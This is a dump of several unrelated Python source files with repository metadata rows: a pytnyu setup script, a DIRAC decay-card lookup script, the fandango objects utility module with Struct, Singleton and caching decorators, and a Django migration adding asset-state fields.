from distutils.core import setup
setup(
description='Tech@NYU API Python Client',
author='TechatNYU',
url='https://github.com/TechAtNYU/pytnyu',
author_email='hello@techatnyu.org',
version='0.0.4',
install_requires=['requests'],
namespace_packages=['pytnyu'],
packages=['pytnyu'],
name='pytnyu',
)
| 23.352941 | 46 | 0.677582 | 46 | 397 | 5.782609 | 0.73913 | 0.082707 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009174 | 0.176322 | 397 | 16 | 47 | 24.8125 | 0.804281 | 0 | 0 | 0 | 0 | 0 | 0.302267 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.2 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
0b373158f05135f2dafba65a6ba39cdf0ba87c6d | 1,348 | py | Python | Badger/scripts/besdirac-wms-decaycard-get.py | zhangxt-ihep/IHEPDIRAC | fb53500a998adc43ff0c65c02caf492da2965de5 | [
"MIT"
] | null | null | null | Badger/scripts/besdirac-wms-decaycard-get.py | zhangxt-ihep/IHEPDIRAC | fb53500a998adc43ff0c65c02caf492da2965de5 | [
"MIT"
] | 1 | 2021-03-04T08:48:38.000Z | 2021-03-04T08:48:38.000Z | Badger/scripts/besdirac-wms-decaycard-get.py | zhangxt-ihep/IHEPDIRAC | fb53500a998adc43ff0c65c02caf492da2965de5 | [
"MIT"
] | 2 | 2020-08-26T06:36:51.000Z | 2021-03-04T08:08:34.000Z | #!/usr/bin/env python
import DIRAC
from DIRAC import S_OK, S_ERROR
from DIRAC.Core.Base import Script
Script.setUsageMessage( """
Insert random trigger file into the File Catalog
Usage:
%s [option] lfn
""" % Script.scriptName )
fcType = 'FileCatalog'
Script.parseCommandLine( ignoreErrors = False )
options = Script.getUnprocessedSwitches()
args = Script.getPositionalArgs()
from DIRAC.Interfaces.API.Dirac import Dirac
dirac = Dirac()
from DIRAC.Resources.Catalog.FileCatalogClient import FileCatalogClient
fccType = 'DataManagement/FileCatalog'
fcc = FileCatalogClient(fccType)
def getMeta(lfn, metaname):
'''Get metadata'''
result = fcc.getDirectoryMetadata(lfn)
if not result['OK']:
print result['Message']
return
if result['Value'].has_key(metaname):
return result['Value'][metaname]
def main():
lfns = args
for lfn in lfns:
print '================================================================================'
print 'Decay card for: %s' % lfn
print '--------------------------------------------------------------------------------'
# print getMeta(lfn, 'jobOptions')
print getMeta(lfn, 'decayCard')
print '--------------------------------------------------------------------------------'
if __name__ == '__main__':
main()
| 25.923077 | 96 | 0.557864 | 126 | 1,348 | 5.880952 | 0.515873 | 0.048583 | 0.037787 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.171365 | 1,348 | 51 | 97 | 26.431373 | 0.663384 | 0.04451 | 0 | 0.058824 | 0 | 0 | 0.322555 | 0.209779 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.147059 | null | null | 0.176471 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
0b4263d7f857ffd13d9244963a213a2d55a3ea6f | 36,145 | py | Python | fandango/objects.py | rhomspuron/fandango | 51cc7659dfa7ea8c5890a993bbcc4c2049e45136 | [
"CC-BY-3.0"
] | null | null | null | fandango/objects.py | rhomspuron/fandango | 51cc7659dfa7ea8c5890a993bbcc4c2049e45136 | [
"CC-BY-3.0"
] | null | null | null | fandango/objects.py | rhomspuron/fandango | 51cc7659dfa7ea8c5890a993bbcc4c2049e45136 | [
"CC-BY-3.0"
] | null | null | null | #!/usr/bin/env python2.5
#############################################################################
##
## file : objects.py
##
## description : see below
##
## project : Tango Control System
##
## $Author: srubio@cells.es, tcoutinho@cells.es, homs@esrf.fr $
##
##
## $Revision: 2008 $
##
## copyleft : ALBA Synchrotron Controls Section, CELLS
## Bellaterra
## Spain
##
#############################################################################
##
## This file is part of Tango Control System
##
## Tango Control System is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as published
## by the Free Software Foundation; either version 3 of the License, or
## (at your option) any later version.
##
## Tango Control System is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with this program; if not, see <http://www.gnu.org/licenses/>.
###########################################################################
"""
fandango.objects contains method for loading python modules and objects
"on the run", as well as several advanced types used within fandango library
Struct, Decorator and Cached are fundamental types for all fandango API's
It includes 2 wonderful classes: Object (by Alejandro Homs)
and Singleton (by Marc Santiago)
Enum classes are borrowed from taurus.core.utils (by Tiago Coutinho)
"""
import __builtin__
from __builtin__ import object
import traceback
from fandango.functional import *
from operator import isCallable, isSequenceType
from collections import Hashable
from types import MethodType
import threading
import functools
#Python 2-3 conundrum
try:
import queue
import queue as Queue
except:
import Queue
import Queue as queue
try:
from collections import namedtuple #Only available since python 2.6
except:
namedtuple = None
## Inspection methods
def dirModule(module):
return [a for a,v in module.__dict__.items()
if getattr(v,'__module__','') == module.__name__]
def findModule(module):
from imp import find_module
if '.' not in module:
return find_module(module)[1]
else:
parent,child = module.rsplit('.', 1)
#mparent = loadModule(parent)
pparent = findModule(parent)
pchild = find_module(child, [pparent])[1]
return pchild
def loadModule(module,modulename=None):
#Loads a python module either from source file or from module
import imp
if modulename or '/' in module or '.py' in module:
if not modulename:
modulename = module.split('/')[-1].split('.py')[0]
modulename = replaceCl('[-\.]', '_', modulename)
return imp.load_source(modulename, module)
elif '.' not in module:
return imp.load_module(module, *imp.find_module(module))
else:
parent,child = module.rsplit('.', 1)
mparent = loadModule(parent)
args = imp.find_module(child, mparent.__path__)
mchild = imp.load_module(module, *args)
return mchild
def dirClasses(module,owned=False):
v = [a for a,v in module.__dict__.items() if isinstance(v,type)]
if owned: return [a for a in dirModule(module) if a in v]
else: return v
def copy(obj):
"""
This method will return a copy for a python primitive object.
It will not work for class objects unless they implement the
__init__(other) constructor
"""
if hasattr(obj,'copy'):
o = obj.copy()
else:
try:
o = type(obj)(other=obj)
except:
o = type(obj)(obj)
return o
##############################################################################
# Methods for pickling/dumping, passing objects to files/queues
def obj2dict(obj,type_check=True,class_check=False,fltr=None):
"""
Converts a python object to a dictionary with all its members
as python primitives
This can be used in Queues or to convert to str using pickle.dumps
:param fltr: a callable(name):bool method
"""
dct = {}
try:
for name in dir(obj):
if fltr and not fltr(name):
continue
try:
attr = getattr(obj,name)
if hasattr(attr,'__call__'): continue
if name == 'inited_class_list': continue
if name.startswith('__'): continue
if type_check:
try:
if type(attr).__name__ not in dir(__builtin__):
if isinstance(attr,dict):
attr = dict((k,v) for k,v in attr.items())
else:
attr = str(attr)
except:
continue
dct[name] = attr
except Exception,e:
print(e)
if class_check:
klass = obj.__class__
if '__class__' not in dct:
dct['__class__'] = klass.__name__
if '__bases__' not in dct:
dct['__bases__'] = [b.__name__ for b in klass.__bases__]
if '__base__' not in dct:
dct['__base__'] = klass.__base__.__name__
except Exception,e:
print(e)
return(dct)
def pick(filename, keys = []):
import pickle
try:
f = open(filename)
v = pickle.load(f)
if keys:
try:
for k in keys:
v = v[k]
except:
traceback.print_exc()
return v
except:
traceback.print_exc()
finally:
f.close()
def dump(value, filename, as_dict = False):
import pickle
try:
f = open(filename, 'w')
if not as_dict:
try:
pickle.dump(value, f)
except:
as_dict = True
if as_dict:
pickle.dump(obj2dict(value), f)
except:
traceback.print_exc()
finally:
f.close()
## Useful class objects
class Struct(object):
"""
Metamorphic type to pass/retrieve data objects as object or dictionary
s = Struct(name='obj1',value=3.0)
s.setCastMethod(lambda k,v: str2type)
s.cast('3.0') : 3.0
s.keys() : ['name', 'value']
s.to_str() : "fandango.Struct({'name': obj1,'value': 3.0,})"
s.dict() : {'name': 'obj1', 'value': 3.0}
"""
def __init__(self,*args,**kwargs):
self.load(*args,**kwargs)
def load(self,*args,**kwargs):
dct = args[0] if len(args)==1 else (args or kwargs)
if isSequence(dct) and not isDictionary(dct):
dct = dict.fromkeys(dct) #isDictionary also matches items lists
[setattr(self,k,v) for k,v in (dct.items()
if hasattr(dct,'items') else dct)]
#Overriding dictionary methods
def update(self,*args,**kwargs): return self.load(*args,**kwargs)
def keys(self): return self.__dict__.keys()
def values(self): return self.__dict__.values()
def items(self): return self.__dict__.items()
def dict(self): return self.__dict__
def get(self,k,default=None):
try: #Some keys may raise exception
return getattr(self,k,default)
except:
return default
def get_key(self,value):
""" Reverse lookup """
for k,v in self.items():
if v == value:
return k
raise Exception('%s_NotFound!'%value)
def set(self,k,v): return setattr(self,k,v)
def setdefault(self,v): self.dict().setdefault(v)
def pop(self,k): return self.__dict__.pop(k)
def has_key(self,k): return self.__dict__.has_key(k)
def __getitem__(self,k): return getattr(self,k)
def __setitem__(self,k,v): return setattr(self,k,v)
def __contains__(self,k): return hasattr(self,k)
def __call__(self,*args,**kwargs):
"""getter with one string, setter if 2 are passed"""
assert len(args) in (1,2)
if len(args)==2: setattr(self,args[0],args[1])
elif len(args)==1 and isString(args[0]): return getattr(self,args[0])
else: self.load(*args,**kwargs)
def __repr__(self):
return 'fandango.Struct({\n'+'\n'.join("\t'%s': %s,"%(k,v)
for k,v in self.__dict__.items())+'\n\t})'
def __str__(self):
return self.__repr__().replace('\n','').replace('\t','')
def to_str(self,order=None,sep=','):
""" This method provides a formatable string for sorting"""
return self.__str__() if order is None else (
sep.join('%s'%self[k] for k in order))
def default_cast(self,key=None,value=None):
"""
This method checks if key is already defined.
If it is, it will return value as an evaluable string.
If it is not, then it will do same action on the passed value.
"""
if key not in self.keys() and not value:
key,value = None,key #defaults to single argument mode
value = notNone(value,key and self.get(key))
if not isString(value):
return value
else:
return str2type(value)
def cast(self,key=None,value=None,method=None):
"""
The cast() method is used to convert an struct to a pickable/json obj
Use set_cast_method(f) to override this call.
The cast method must accept both key and value keyword arguments.
"""
return (method or self.default_cast)(key,value)
def cast_items(self,items=[],update=True):
"""
The cast() method is used to convert an struct to a pickable/json obj
"""
items = items or self.items()
items = [(k,self.cast(value=v)) for k,v in self.items()]
if update:
[self.set(k,v) for k,v in items]
return items
def _fget(self,var):
return getattr(self,var)
def _fset(self,value,var):
setattr(self,var,value)
def _fdel(self,var):
delattr(self,var)
def make_property(var,fget=_fget,fset=_fset,fdel=_fdel):
""" This Class is in Beta, not fully implemented yet"""
return property(partial(fget,var=var),partial(fset,var=var),
partial(fdel,var=var),doc='%s property'%var)
class Variable(object):
"""
This class helps to declare module variables that can share the
state when updated from parent modules.
e.g. fandango.DEFAULT_TIME_FORMAT <=> functional.DEFAULT_TIME_FORMAT
"""
def __new__(cls, value):
print(cls,value)
__instance = object.__new__(cls, value)
cls.__init__(__instance, value)
return __instance.value
def __init__(self, value = None):
self._value = value
@property
def value(self):
return self._value
@value.setter
def set_value(self, value):
self._value = v
#class NamedProperty(property):
#"""
#"""
#def __init__(self,name,fget=None,fset=None,fdel=None):
#self.name = name
#mname = '%s%s'%(name[0].upper(),name[1:])
#lname = '%s%s'%(name[0].lower(),name[1:])
#property.__init__(fget,fset,fdel,doc='NamedProperty(%s)'%self._name)
#def get_attribute_name(self):
#return '_%s'self.name
def NamedProperty(name,fget=None,fset=None,fdel=None):#,doc=None):
"""
This Class is in Beta, not fully implemented yet
It makes easier to declare name independent property's (descriptors) by
using template methods like:
def fget(self,var): # var is the identifier of the variable
return getattr(self,var)
def fset(self,value,var): # var is the identifier of the variable
setattr(self,var,value)
def fdel(self,var): # var is the identifier of the variable
delattr(self,var)
MyObject.X = Property(fget,fset,fdel,'X')
"""
return property(partial(fget,var=name) if fget else None,
partial(fset,var=name) if fset else None,
partial(fdel,var=name) if fdel else None,doc=name)
import threading
__lock__ = threading.RLock()
def locked(f,*args,**kwargs):
"""
decorator for secure-locked functions
A key-argument _lock can be used to use a custom Lock object
"""
_lock = kwargs.pop('_lock',__lock__)
try:
_lock.acquire()
return f(*args,**kwargs)
except Exception,e:
print 'Exception in%s(*%s,**%s): %s' % (f.__name__,args,kwargs,e)
finally:
_lock.release()
def self_locked(func,reentrant=True):
''' Decorator to make thread-safe class members
@deprecated
@note see in tau.core.utils.containers
Decorator to create thread-safe objects.
reentrant: CRITICAL:
With Lock() this decorator should not be used to decorate nested
functions; it will cause Deadlock!
With RLock this problem is avoided ... but you should rely more
on python threading.
'''
@functools.wraps(func)
def lock_fun(self,*args,**kwargs):
#self,args = args[0],args[1:]
if not hasattr(self,'lock'):
setattr(self,'lock',threading.RLock() if reentrant
else threading.Lock())
if not hasattr(self,'trace'):
setattr(self,'trace',False)
self.lock.acquire()
try:
#if self.trace: print "locked: %s"%self.lock
result = func(self,*args,**kwargs)
finally:
self.lock.release()
#if self.trace: print "released: %s"%self.lock
return result
#lock_fun.__name__ = func.__name__
#lock_fun.__doc__ = func.__doc__
return lock_fun
###############################################################################
def NewClass(classname,classparent=None,classdict=None):
"""
Creates a new class on demand:
ReleaseNumber = NewClass('ReleaseNumber',tuple,
{'__repr__':(lambda self:'.'.join(('%02d'%i for i in self)))})
"""
if classparent and not isSequence(classparent):
classparent = (classparent,)
return type(classname,classparent or (object,),classdict or {})
class ReleaseNumber(object):
"""
ReleaseNumber = type('ReleaseNumber',(tuple,),{
'__repr__':(lambda self:'.'.join(('%02d'%i for i in self)))
})
"""
def __init__(self,*args):
assert args
if len(args)==1:
if isinstance(args[0],basestring):
args = args[0].split('.')
elif isSequenceType(args[0]):
args = args[0]
else:
args = [args]
self._tuple = tuple(args)
def __iter__(self): return self._tuple.__iter__()
def __len__(self): return self._tuple.__len__()
def __getitem__(self,i): return self._tuple.__getitem__(i)
def __hash__(self): return self._tuple.__hash__()
def __repr__(self):
return '.'.join(map(str,self))
def major(self):
try:
m = int(self[0])
return m
except:
return '0'
def minor(self):
try:
m = int(self[1])
return m
except:
return '0'
def patch(self):
try:
m = int(self[2])
return m
except:
return self[2] if len(self)>2 else '0'
def __cmp__(self,other):
if not isinstance(other,ReleaseNumber):
other = ReleaseNumber(other)
if self._tuple == other._tuple:
return 0
if int(self.major()) < other.major():
return -1
if int(self.major()) > other.major():
return 1
if int(self.minor()) < other.minor():
return -1
if int(self.minor()) > other.minor():
return 1
if self.patch() < other.patch():
return -1
if self.patch() > other.patch():
return 1
return 0
def __gt__(self,other): return self.__cmp__(other) > 0
def __ge__(self,other): return self.__cmp__(other) >= 0
def __lt__(self,other): return self.__cmp__(other) < 0
def __le__(self,other): return self.__cmp__(other) <= 0
def __eq__(self,other): return not self.__cmp__(other)
def __ne__(self,other): return self.__cmp__(other)
###############################################################################
class Object(object):
"""
This class solves some problems when an object inherits from multiple
classes and some of them inherit from the same 'grandparent' class
"""
def __init__(self):
""" default initializer
@todo be more clever!
"""
pass
#self.name = None
## @var name
# Var does nothing
# @todo be more clever!
pass
def call__init__(self, klass, *args, **kw):
if 'inited_class_list' not in self.__dict__:
self.inited_class_list = []
if klass not in self.inited_class_list:
self.inited_class_list.append(klass)
#print('#'*80)
#print('%s(%s).call__init__(%s,%s)' % (
#type(self).__name__,klass.__name__,args,kw))
#print('#'*80)
klass.__init__(self, *args, **kw)
def call_all__init__(self, klass, *_args, **_kw):
''' Call __init__ recursively, for multiple dynamic inheritance.
@author srubio@cells.es
This method should be called only if all arguments are keywords!!!
Multiple __init__ calls with unnamed arguments is hard to manage:
All the _args values will be assigned to non-keyword args
e.g:
from objects import Object
class A(Object):
def __init__(self,a=2):
print 'A.__init__',a
class B(A):
def __init__(self,b):
print 'B.__init__',b
class C(B,A):
def __init__(self,c):
print 'C.__init__',c
class D(C,B):
def __init__(self,d=1,*args,**kwargs):
self.call_all__init__(D,*args,**kwargs)
print 'D.__init__',d
D(a=1,b=2,c=3,d=4)
'''
#if _args:
# raise Exception,'__init_all_Object_withUnnamedArgumentsException'
from inspect import getargspec
#print '%s.call_all__init__(%s,%s)' % (klass.__name__,_args,_kw)
for base in klass.__bases__:
if 'call__init__' in dir(base) and \
('inited_class_list' not in self.__dict__
or base not in self.inited_class_list):
#print '\t%s.base is %s' % (klass.__name__,base.__name__)
nkw,i = {},0
try:
args,largs,kargs,vals = getargspec(base.__init__)
if kargs: nkw = dict(_kw)
for arg in args:
if arg == 'self': continue
if arg in _kw:
nkw[arg] = _kw[arg]
elif i<len(_args):
nkw[arg], i = _args[i], i+1
self.call_all__init__(base,*_args,**_kw)
self.call__init__(base,**nkw)
except Exception,e:
print('Unable to execute %s.__init__!: %s'
% (base.__name__,str(e)))
return
def getAttrDict(self):
return obj2dict(self)
def updateAttrDict(self, other):
attr = other.getAttrDict()
self.__dict__.update(attr)
###############################################################################
class Singleton(object):
"""
This class allows Singleton objects overriding __new__ and renaming
__init__ to init_single
The __new__ method is overriden to force Singleton behaviour,
the Singleton is created for the lowest subClass.
@warning although __new__ is overriden __init__ is still being called
for each instance=Singleton(), this is way we replace it by __dub_init
"""
## Singleton object
# the one, true Singleton, private members cannot be read directly
__instance = None
__dumb_init = (lambda self,*p,**k:None)
def __new__(cls, *p, **k):
if cls != type(cls.__instance):
__instance = object.__new__(cls)
#srubio: added init_single check to prevent redundant __init__ calls
if hasattr(cls,'__init__') and cls.__init__ != cls.__dumb_init:
setattr(cls,'init_single',cls.__init__)
#Needed to avoid parent __init__ methods to be called
setattr(cls,'__init__',cls.__dumb_init)
if hasattr(cls,'init_single'):
#If no __init__ or init_single has been defined it may trigger
#an object.__init__ warning!
cls.init_single(__instance,*p,**k)
#Done at the end to prevent failed __init__ to create singletons
cls.__instance = __instance
return cls.__instance
@classmethod
def get_singleton(cls,*p,**k):
return cls.__instance or cls(*p,**k)
@classmethod
def clear_singleton(cls):
cls.__instance = None
class SingletonMap(object):
"""
This class allows distinct Singleton objects for each args combination.
The __new__ method is overriden to force Singleton behaviour, the Singleton
is created for the lowest subClass.
@warning although __new__ is overriden __init__ is still being called
for each instance=Singleton(), this is way we replace it by __dub_init
"""
## Singleton object
# the one, true Singleton, private members cannot be read directly
__instances = {}
__dumb_init = (lambda self,*p,**k:None)
def __new__(cls, *p, **k):
key = cls.parse_instance_key(*p,**k)
if cls != type(cls.__instances.get(key)):
__instance = object.__new__(cls)
__instance.__instance_key = key
#srubio:added init_single check to prevent redundant __init__ calls
if hasattr(cls,'__init__') and cls.__init__ != cls.__dumb_init:
setattr(cls,'init_single',cls.__init__)
#Needed to avoid parent __init__ methods to be called
setattr(cls,'__init__',cls.__dumb_init)
if hasattr(cls,'init_single'):
#If no __init__ or init_single has been defined it may trigger
#an object.__init__ warning!
cls.init_single(__instance,*p,**k)
cls.__instances[key] = __instance
#print('#'*80+'\n'+'%s.__instances[%s] = %s'
# %(str(cls),key,str(__instance))
return cls.__instances[key]
@classmethod
def get_singleton(cls,*p,**k):
key = cls.parse_instance_key(*p,**k)
return cls.__instances.get(key,cls(*p,**k))
@classmethod
def get_singletons(cls):
return cls.__instances
@classmethod
def clear_singleton(cls,*p,**k):
cls.__instances.pop(cls.parse_instance_key(*p,**k))
@classmethod
def clear_singletons(cls):
cls.__instances.clear()
@classmethod
def parse_instance_key(cls,*p,**k):
return '%s(*%s,**%s)' % (cls.__name__,list(p),list(sorted(k.items())))
def get_instance_key(self):
return self.__instance_key
###############################################################################
class nullDecorator(object):
"""
Empty decorator with null arguments, used to replace pyqtSignal,pyqtSlot
"""
def __init__(self,*args):
pass
def __call__(self,f):
return f
def decorator_with_args(decorator):
'''
Decorator with Arguments must be used with parenthesis: @decorated()
, even when arguments are not used!!!
This method gets an d(f,args,kwargs) decorator and returns a new
single-argument decorator that embeds the new call inside.
But, this decorator disturbed stdout!!!!
There are some issues when calling nested decorators; it is clearly
better to use Decorator classes instead.
'''
# decorator_with_args = lambda decorator: \
# lambda *args, **kwargs: lambda func: decorator(func, *args, **kwargs)
return lambda *args, **kwargs: lambda func: decorator(func, *args, **kwargs)
class Decorated(object):
"""
@TODO: This class should provide an API to get all decorators
applied to a python object and its methods
"""
pass
class Decorator(object):
"""
This generic class allows to differentiate decorators from common classes.
"""
__example__ = """
SEE THE Cached DECORATOR CLASS FOR A REAL EXAMPLE, THIS IS JUST AN
ABSTRACT CLASS WITHOUT IMPLEMENTATION
It uses the __get__ descriptor to allow decoration of Class methods
Inherit from it and use issubclass(klass,Decorator) to know if a class
is a decorator
To add arguments to decorator reimplement __init__
To modify your wrapper reimplement __call__
A decorator __init__ with a single argument can be called like:
@D
def f(x):
pass
If you need a Decorator with arguments then __init__ will manage the
arguments and __call__ will take the function and return a wrapper instead.
@D(x,y)
def f(z):
pass
"""
@classmethod
def new_wrapped_instance(cls, *args, **kwargs):
""" obtain a better wrapped instance, experimental, doesnt work well on py2 """
func = args and args[0] or None
i = object.__new__(type(cls.__name__+'_'+func.__name__,(cls,),
{'__doc__': func.__doc__}))
cls.__init__(i,*args,**kwargs)
return i
def __init__(self,func):
self.func = func
#self.call = wraps(self.func)(self.__call__) #Not for methods!!
functools.update_wrapper(self,self.func)
def __call__(self,*args,**kwargs):
return self.func(*args,**kwargs)
def __get__(self,obj,objtype=None):
"""
This bounding method will be called only when decorating an
instance method
"""
return MethodType(self,obj,objtype)
def get_func(self):
return self.func
class ClassDecorator(Decorator):
"""
This empty class is not trivial. It identifies the QObject decorators
from fandango.qt module
Although empty, it is critical for Vacca. Modify it with care
"""
pass
class Cached(Decorator):
"""
This decorator will provide a function that caches up to N different
executions of a method (for different combinations of arguments) for
a given period. It is very similar to functools.lru_cache in py3
"""
__example__ = """
e.g.: check_device_cached = Cached(check_device,depth=10,keep=3)
It will keep cached for 3 seconds up to 10 different device check results.
If "func" is not declared, then it can be used as a decorator_with_args
@Cached(depth=10,keep=3)
def check_device(*a,**k):
...
return
The catched argument will print and return exceptions instead of throwing
"""
def __init__(self,func=None,depth=10,expire=3.,log=False,catched=False):
self.log = log
self._im = None
self.cache = {}
self.depth = depth
self.expire = expire
self.catched = catched
self.decorate(func)
#self.__code__ = getattr(func,'__code__',None)
self.__doc__ = '@Cached:'+str(getattr(func,'__doc__','') or '')
self.lock = threading.Lock()
def __call__(self,*args,**kwargs):
"""
This method will either decorate a method (with args) or execute it
"""
if self.func is None:
# Deferred decorator
self.decorate(args[0])
return self
else:
# Instantiated decorator
return self.execute(*args,**kwargs)
def _log(self,msg):
if isCallable(self.log):
self.log(msg)
elif self.log:
print(msg)
@staticmethod
def getCachedObject(obj,methods=[],depth=10.,expire=3.,catched=False):
""" @RISKY
This method will try to apply Cached decorator to all methods
of an object. USE IT AT YOUR OWN RISK!!
"""
klass = obj if isinstance(obj,type) else type(obj)
if not methods:
methods = [k for k,f in klass.__dict__.items() if isCallable(f)]
for k in methods:
try:
m = Cached(getattr(klass,k),depth,expire,catched=catched)
setattr(obj,k,m)
except:pass
return obj
def decorate(self,func):
if isCallable(func):
#self._log('decorate(%s)'%str(func))
self.func = func
#self.call = wraps(self.func)(self.__call__) #Not for methods!!
functools.update_wrapper(self,self.func)
else:
self.func = None
def prune(self,expire=None,depth=None):
try:
self.lock.acquire()
depth = notNone(depth,self.depth)
expire = time.time()-notNone(expire,self.expire)
cache = sorted(k for k in self.cache.keys() if k[0]>expire)
if (len(cache)!=len(self.cache) or len(cache)>self.depth):
#self._log('pruning: %s => %s'%(len(self.cache),len(cache)))
pass
self.cache = dict((k,self.cache[k]) for k in cache[-self.depth:])
return sorted(self.cache.keys())
finally:
self.lock.release()
def clear(self):
self.cache.clear()
def execute(self,*args,**kwargs):
#self._log('__call__(%s,%s)'%(args,kwargs))
v,match,expire = None,None,self.expire
try:
key = time.time(),tuple(args),tuple(kwargs.items())
#assert all(isinstance(k,Hashable) for l in key[1:] for k in l)
assert isHashable(key)
except:
self._log('unhashable arguments!')
expire = 0
if not self.depth or not expire:
self._log('disabling cache ...')
if not self.depth: self.cache = {}
return self.func(*args,**kwargs)
else:
cache = self.prune(expire)
match = first((k for k in cache if (k[1:]) == (key[1:])),None)
if match:
v = self.cache[match]
#self._log('(%s,%s) was in cache: %s'%(args,kwargs,v))
else:
try:
v = self.func(*args,**kwargs)
except Exception,e:
v = e
#self._log('%s(%s,%s) = %s'%(self.func,args,kwargs,v))
try:
self.cache[key] = v
except:
print('%s(%s,%s) = %s'%(self.func,args,kwargs,v))
print('cache[%s] = %s'%(key,v))
raise
if isinstance(v,Exception):
if self.catched:
if not match:
self._log(traceback.format_exc())
return v
else:
self._log(str(self.func))
self._log(traceback.format_exc())
raise v
else:
return v
###########################################################################
## @DEPRECATED!
class BoundDecorator(Decorator):
"""
DEPRECATED , To be removed in Fandango 13;
replaced by the use of __get__ descriptor
Inspired in
https://wiki.python.org/moin/PythonDecoratorLibrary
#Class_method_decorator_using_instance
Class method decorator specific to the instance.
It uses a descriptor to delay the definition of the
method wrapper.
To use it, just inherit from it and rewrite the wrapper method
Example:
from fandango.objects import BoundDecorator
BoundDecorator().tracer = 1
class X(object):
def __init__(self,name):
self.name = name
def f(self,*args):
return (self.name,args)
class D(BoundDecorator):
@staticmethod
def wrapper(instance,f,*args,**kwargs):
print('guess what?')
v = f(instance,*args,**kwargs)
return v[0]
x = X('a')
X.f = D()(X.f)
x.f()
"""
def __init__(self,*args,**kwargs):
print('BoundDecorator is DEPRECATED!!!, Use Decorator.__get__ instead')
Decorator.__init__(self,*args,**kwargs)
@staticmethod
def wrapper(instance,f,*args,**kwargs):
return f(instance, *args, **kwargs)
class _Tracer(object):
def __init__(self):
self._trace = False
def __get__(self,obj,type=None):return self
def __set__(self,obj,value):self._trace = value
def __nonzero__(self): return self._trace
def __call__(self,msg):
if self: print(msg)
#NOTE: Giving a value to Tracer only works with instances; not from class
tracer = _Tracer()
def __call__(this,f=None):
class _Descriptor(BoundDecorator):
# Inherits to get the wrapper from the BoundDecorator class
# and be able to exist "onDemand"
def __init__(self, f):
self.func = f
def __get__(self, instance, klass):
BoundDecorator.tracer('__get__(%s,%s)'%(instance,klass))
if instance is None:
# Class method was requested
return self.make_unbound(klass)
return self.make_bound(instance)
def make_unbound(self, klass):
BoundDecorator.tracer('make_unbound(%s)'%klass)
@functools.wraps(self.func)
def wrapper(*args, **kwargs):
'''This documentation will disapear :)
This method may work well only without arguments
'''
BoundDecorator.tracer(
"Called the unbound method %s of %s"
%(self.func.__name__, klass.__name__))
return partial(this.wrapper,f=f)(*args,**kwargs)
return wrapper
def make_bound(self, instance):
BoundDecorator.tracer('make_bound(%s)'%instance)
@functools.wraps(self.func)
def wrapper(*args, **kwargs):
'''This documentation will disapear :)'''
BoundDecorator.tracer(
"Called the decorated method %s of %s"
%(self.func.__name__, instance))
#return self.func(instance, *args, **kwargs)
return this.wrapper(instance,f,*args,**kwargs)
#wrapper = self.wrapper #wraps(self.func)(self.wrapper)
# This instance does not need the descriptor anymore,
# let it find the wrapper directly next time:
setattr(instance, self.func.__name__, wrapper)
return wrapper
return _Descriptor(f)
from . import doc
__doc__ = doc.get_fn_autodoc(__name__,vars())
| 33.938967 | 89 | 0.56135 | 4,340 | 36,145 | 4.441014 | 0.150691 | 0.02231 | 0.009131 | 0.002179 | 0.230051 | 0.187455 | 0.165404 | 0.142212 | 0.131109 | 0.098008 | 0 | 0.005 | 0.313819 | 36,145 | 1,064 | 90 | 33.970865 | 0.772115 | 0.109171 | 0 | 0.280822 | 0 | 0 | 0.078391 | 0.004631 | 0 | 0 | 0 | 0.00282 | 0.005137 | 0 | null | null | 0.015411 | 0.035959 | null | null | 0.023973 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
0b44a978913b26bbf0d8ab188b6560f82d0fe2d3 | 1,068 | py | Python | core/migrations/0044_auto_20190510_0921.py | raheemazeezabiodun/art-backend | 0bc47f3cf6f403101082f201c7fd1ca8108d5731 | [
"MIT"
] | 4 | 2018-03-12T23:49:01.000Z | 2020-07-06T17:37:29.000Z | core/migrations/0044_auto_20190510_0921.py | raheemazeezabiodun/art-backend | 0bc47f3cf6f403101082f201c7fd1ca8108d5731 | [
"MIT"
] | 259 | 2018-02-06T07:53:07.000Z | 2020-06-05T19:18:32.000Z | core/migrations/0044_auto_20190510_0921.py | raheemazeezabiodun/art-backend | 0bc47f3cf6f403101082f201c7fd1ca8108d5731 | [
"MIT"
] | 22 | 2018-01-25T14:02:05.000Z | 2020-06-24T20:37:01.000Z | # Generated by Django 2.1.7 on 2019-05-10 09:21
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('core', '0043_auto_20190424_1029'),
]
operations = [
migrations.RemoveField(
model_name='statetransition',
name='state',
),
migrations.AddField(
model_name='statetransition',
name='asset_state_from_report',
field=models.CharField(choices=[('requires repair', 'requires repair'), ('requires external assessment', 'requires external assessment'), ('Damaged', 'Damaged')], default='requires repair', max_length=50),
),
migrations.AddField(
model_name='statetransition',
name='incident_report_state',
field=models.CharField(choices=[('newly reported', 'newly reported'), ('internal assessment', 'internal assessment'), ('external assessment', 'external assessment'), ('out for repair', 'out for repair')], default='newly reported', max_length=50),
),
]
